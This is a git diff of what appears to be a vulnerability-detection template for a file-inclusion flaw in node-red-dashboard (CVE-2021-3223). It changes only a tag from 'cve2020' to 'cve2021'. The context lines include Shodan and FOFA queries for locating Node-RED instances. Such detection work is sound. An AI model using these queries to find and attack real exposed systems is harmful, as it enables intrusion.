24c35dc1d1..a9dd6fd4d3 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -18,7 +18,7 @@ info: verified: true shodan-query: title:"Node-RED" fofa-query: title="Node-RED" - tags: cve,cve2020,node-red-dashboard,lfi + tags: cve,cve2021,node-red-dashboard,lfi requests: - method: GET